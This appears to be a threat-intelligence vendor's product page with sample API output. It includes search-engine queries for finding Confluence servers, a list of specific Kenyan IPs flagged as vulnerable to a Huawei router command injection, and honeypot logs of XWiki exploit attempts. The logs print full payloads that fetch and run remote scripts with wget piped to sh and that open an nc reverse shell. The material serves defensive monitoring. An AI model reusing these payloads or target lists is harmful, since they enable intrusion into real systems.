"https://en.fofa.info/result?qbase64=aGVhZGVyPSJTZXQtQ29va2llOiBKU0VTU0lPTklEIiAmJiBoZWFkZXI9IlgtQ29uZmx1ZW5jZS1SZXF1ZXN0LVRpbWUiICYmIGJvZHk9ImNvbmZsdWVuY2UtY29udGV4dC1wYXRoIiAmJiBpY29uX2hhc2g9Ii0zMDUxNzkzMTIi"
],
"fofaRawQueries": [
"header=\"Set-Cookie: JSESSIONID\" && header=\"X-Confluence-Request-Time\" && body=\"confluence-context-path\" && icon_hash=\"-305179312\""
],
"zoomEyeQueries": [
"https://www.zoomeye.ai/searchResult?q=aHR0cC5oZWFkZXI9IlNldC1Db29raWU6IEpTRVNTSU9OSUQiICYmIGh0dHAuaGVhZGVyPSJYLUNvbmZsdWVuY2UtUmVxdWVzdC1UaW1lIiAmJiBodHRwLmJvZHk9ImNvbmZsdWVuY2UtY29udGV4dC1wYXRoIiAmJiBpY29uaGFzaD0iLTMwNTE3OTMxMiI%3D"
],
"zoomEyeRawQueries": [
"http.header=\"Set-Cookie: JSESSIONID\" && http.header=\"X-Confluence-Request-Time\" && http.body=\"confluence-context-path\" && iconhash=\"-305179312\""
],
"shodanRawQueries": [
"+http.favicon.hash:-305179312 \"X-Confluence-Request-Time\" +\"Set-Cookie: JSESSIONID=\" +html:\"confluence-context-path\"",
"X-Confluence-Request-Time +\"JSESSIONID\" +html:\"atlassian-authentication-plugin\" -\"145DF9C4CDE560B2699212692B867CDA\"",
"X-Confluence-Request-Time +\"Set-Cookie: JSESSIONID\" +html:\"SAML POST Binding\""
],
"censysRawQueries": [
"host.services:(endpoints.http.favicons.hash_md5=\"966e60f8eb85b7ea43a7b0095f3e2336\" and banner:\"Set-Cookie: JSESSIONID\" and banner:\"X-Confluence-Request-Time\" and endpoints.http.body:\"confluence-context-path\")"
],
"censysLegacyRawQueries": [
"same_service(services.http.response.favicons.md5_hash=\"966e60f8eb85b7ea43a7b0095f3e2336\" and services.banner:\"Set-Cookie: JSESSIONID\" and services.banner:\"X-Confluence-Request-Time\" and services.http.response.body:\"confluence-context-path\")"
],
"cloneSSHURL": "git@git.vulncheck.com:vulncheck/initial-access.git"
}
],
"_timestamp": "2025-08-26T00:22:25.386422501Z"
}
]
IP Intelligence
IP Intelligence data on potentially vulnerable systems, attacker command & control infrastructure (C2), honeypots, proxies, and more.
- C2, webshells, open directories, implant detection, etc.
- 3 days (what's live right now), 10 days, 30 days, & 90 days
- For our Government partners, instead of just reporting we found implanted devices, we report how we detected the implants
GET /v3/index/ipintel-3d?id=initial-access&country=Kenya
[
{
"ip": "197.248.210.223",
"port": 3013,
"ssl": false,
"lastSeen": "2025-10-10T02:12:29.637398",
"asn": "AS37061",
"country": "Kenya",
"country_code": "KE",
"city": "Nairobi",
"cve": [
"CVE-2017-17215"
],
"matches": [
"Huawei EchoLife HG532 UPNP Command Injection"
],
"hostnames": [
"197-248-210-223.safaricombusiness.co.ke"
],
"type": {
"id": "initial-access",
"kind": "",
"finding": "potentially vulnerable"
},
"feed_ids": [
"ec6e3e94-a897-4152-8c16-74983e4a39fd"
],
"_timestamp": "2025-10-10T12:42:37.741942759Z"
},
{
"ip": "41.212.56.92",
"port": 20440,
"ssl": false,
"lastSeen": "2025-10-10T01:49:48.441992",
"asn": "AS15399",
"country": "Kenya",
"country_code": "KE",
"city": "Mombasa",
"cve": [
"CVE-2017-17215"
],
"matches": [
"Huawei EchoLife HG532 UPNP Command Injection"
],
"hostnames": [
"41.212.56.92.wananchi.com"
],
"type": {
"id": "initial-access",
"kind": "",
"finding": "potentially vulnerable"
},
"feed_ids": [
"ec6e3e94-a897-4152-8c16-74983e4a39fd"
],
"_timestamp": "2025-10-10T12:44:12.548104209Z"
},
{
"ip": "41.212.56.92",
"port": 46443,
"ssl": false,
"lastSeen": "2025-10-10T01:45:15.976491",
"asn": "AS15399",
"country": "Kenya",
"country_code": "KE",
"city": "Mombasa",
"cve": [
"CVE-2017-17215"
],
"matches": [
"Huawei EchoLife HG532 UPNP Command Injection"
],
"hostnames": [
"41.212.56.92.wananchi.com"
],
"type": {
"id": "initial-access",
"kind": "",
"finding": "potentially vulnerable"
},
"feed_ids": [
"ec6e3e94-a897-4152-8c16-74983e4a39fd"
],
"_timestamp": "2025-10-10T12:42:41.816303689Z"
}
]
Canary Intelligence
Canary Intelligence data on attempted and successful attempts at vulnerability exploitation in-the-wild.
- Providing early visibility into active threats targeting the Internet and critical infrastructure.
- Campaigns, and infrastructure, enabling meaningful attribution and intelligence production.
- Guide cyber operations, and maintain a decisive operational advantage.
GET /v3/index/vulncheck-canaries
[
{
"src_ip": "193.26.115.195",
"src_port": 47922,
"src_country": "US",
"dst_country": "BR",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "R0VUIC94d2lraS9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0QlNUIlMjdzaCUyNyUyQyUyMCUyNy1jJTI3JTJDJTIwJTI3d2dldCUyMC1xTy0lMjBodHRwJTNBJTJGJTJGNzQuMTk0LjE5MS41MiUyRnJvbmRvLnNkdS5zaCU3Q3NoJTI3JTVELmV4ZWN1dGUlMjglMjkudGV4dCU3QiU3QiUyRmdyb292eSU3RCU3RCU3QiU3QiUyRmFzeW5jJTdEJTdEIEhUVFAvMS4xDQpIb3N0OiBWQ19SRURBQ1RFRA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKGJhbmcyMDEzQGF0b21pY21haWwuaW8pDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K",
"http": {
"url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D",
"http_user_agent": "Mozilla/5.0 (bang2013@atomicmail.io)",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-11-07T07:58:51.064Z"
},
{
"src_ip": "172.206.196.45",
"src_port": 51864,
"src_country": "US",
"dst_country": "CA",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "R0VUIC9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN2QlN2QlN2QlN2IlN2Jhc3luYyUyMGFzeW5jJTNkZmFsc2UlN2QlN2QlN2IlN2Jncm9vdnklN2QlN2RwcmludGxuKCUyMndnZXQlMjBodHRwOi8vOTAuMTU2LjIxOC4zMTo4MDgwL1ZreTBiNEo5SzMveDY0MCUyMC1PJTIwL3RtcC9mMWM1ZiUyMi5leGVjdXRlKCkudGV4dCklN2IlN2IlMmZncm9vdnklN2QlN2QlN2IlN2IlMmZhc3luYyU3ZCU3ZCUyMCBIVFRQLzEuMQ0KSG9zdDogVkNfUkVEQUNURUQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChNYWNpbnRvc2g7IEludGVsIE1hYyBPUyBYIDEwXzE1XzcpIEFwcGxlV2ViS2l0LzYwNS4xLjE1IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi8xNi40LjEgU2FmYXJpLzYwNS4xLjE1DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4NCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=",
"http": {
"url": "/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22wget%20http://90.156.218.31:8080/Vky0b4J9K3/x640%20-O%20/tmp/f1c5f%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20",
"http_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4.1 Safari/605.1.15",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-11-01T12:14:26.712Z"
},
{
"src_ip": "18.228.3.224",
"src_port": 37348,
"src_country": "BR",
"dst_country": "FR",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "R0VUIC94d2lraS9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0QlN0QlN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0QlMjJidXN5Ym94JTIwbmMlMjAxOC4yMjguMy4yMjQlMjA4NDQzJTIwLWUlMjAvYmluL2Jhc2glMjIuZXhlY3V0ZSUyOCUyOSU3QiU3Qi9ncm9vdnklN0QlN0QlN0IlN0IvYXN5bmMlN0QlN0QgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBweXRob24tcmVxdWVzdHMvMi4zMi40DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUsIHpzdGQNCkFjY2VwdDogKi8qDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==",
"http": {
"url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%2018.228.3.224%208443%20-e%20/bin/bash%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D",
"http_user_agent": "python-requests/2.32.4",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-10-31T10:16:30.275Z"
}
]